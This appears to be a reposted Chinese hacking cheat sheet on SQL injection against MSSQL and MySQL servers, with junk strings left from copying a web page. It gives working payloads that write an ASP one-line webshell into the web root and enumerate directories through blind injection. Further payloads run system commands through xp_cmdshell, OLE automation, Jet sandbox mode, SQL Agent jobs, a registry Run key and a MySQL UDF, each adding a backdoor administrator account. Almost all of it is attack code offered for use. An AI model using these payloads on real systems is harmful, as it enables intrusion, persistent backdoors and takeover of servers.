mssql实用命令及导出一句话

admin

MSSQL语句导出一句话木马
0 O2 T9 X* B( x' |6 L3 }首先确定网站的WEB路径
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马

& h/ M+ k4 }5 j1 x  r  l;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
+ k5 k+ p1 z- h1 w2 R//将一句话木马插入表中

;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
//导出一个ASP文件
7 L! P8 m+ j3 s* r7 y" o

$ l4 z, `+ U. ^1 W; y: |8 q( H关于MSSQL列目录
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
& |& q! t! G  L: oInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
0 @- e4 x' T9 U$ ^) I6 l( ?) Y7 d
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
9 l1 T+ @, R5 q8 x  `  H
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段

) A' k- ~! V$ U2 g/ T2 L" u8 EAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
, ^( F# S3 x( y  O  i: c. p0 a

5 N9 _6 {! j2 l, s& ]# Q# `0 N数据库版本和权限查看
and 1=(select @@VERSION) //查看详细的数据库信息.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER

  }* M4 n2 n" U6 ]
# C9 m: T* J. L. \3 f' P1.利用xp_cmdshell执行命令
exec master..xp_cmdshell 'net user rfire 123456 /add'
$ O5 `/ g4 g; n8 R4 j: a4 `3 Q* ?exec master..xp_cmdshell 'net localgroup administrators rfire /add'
  B" v6 z6 s" O3 I6 H
恢复xp_cmdshell存储过程
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

3 l; o3 N9 }# v. g9 N: _( i
* L, Q  l) \8 _# {5 t2.利用SP_OAcreate和SP_OAMETHOD执行命令
* R* ]; N0 {0 f在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
DECLARE @shell INT //建立一个@shell实体
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
+ b: ?& D, F4 D0 R( G+ nEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
+ U8 H# b" w! n1 j+ N- S
6 q  i  v( j, x6 k$ |7 k
- H' ~* }$ m$ ~' C6 X. @; d3.利用沙盒模式
: Q: q* }. |' G6 Z先利用xp_regwrite（前提是要求xp_regwrite存在）改注册表，然后用OpenRowSet访问系统自身mdb文件，然后执行SQL语句。
3 c) ^4 X. F+ `% ~6 b9 v" |开启沙盒模式：
6 O" x0 g: f) N8 jEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0

执行命令：
- [  \" i+ J7 ], |6 e7 s- ]6 oSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
+ X+ R% _2 y- z( ]9 O' [9 H

4.利用SQL代理执行命令
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
) d! Z" J$ I% d! {+ f
) j8 {( w; U5 Z  y. G执行命令：
  W: _  H) ^4 n" n8 `3 I5 juse msdb exec sp_delete_job null,'x' //进入msdb数据库，删除x作业防止出错
$ D4 u9 V& n- mexec sp_add_job 'x'
7 V( ]+ P' a6 b& r" _exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
5 H; M3 l3 H4 N$ Z; p
+ i; d' x) f  L  B) H% |' y' L
5.利用注册表项执行命令（用xp_regwrite将执行命令写入启动项）
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'

: o6 m$ V, q4 S2 ^6 C, e
6.MYSQL的命令执行
9 O" \  Y2 V. L0 c4 x$ p& v% c. bMYSQL的UDF自定义函数提权（要求账号拥有insert和delete权限）
9 B+ t6 W2 U: v  \首先要在su.php下导出c:\windows\udf.dll
; P) f$ F; M1 H9 k" H) N9 y导出后执行创建自定义函数命令：
- r4 S% D9 M2 |Create Function cmdshell returns string soname 'udf.dll'
执行命令
select cmdshell('net user rfire 123456 /add')
( {' @* ?% [3 M7 d! l! p7 N2 g) a执行后删除函数 drop function cmdshell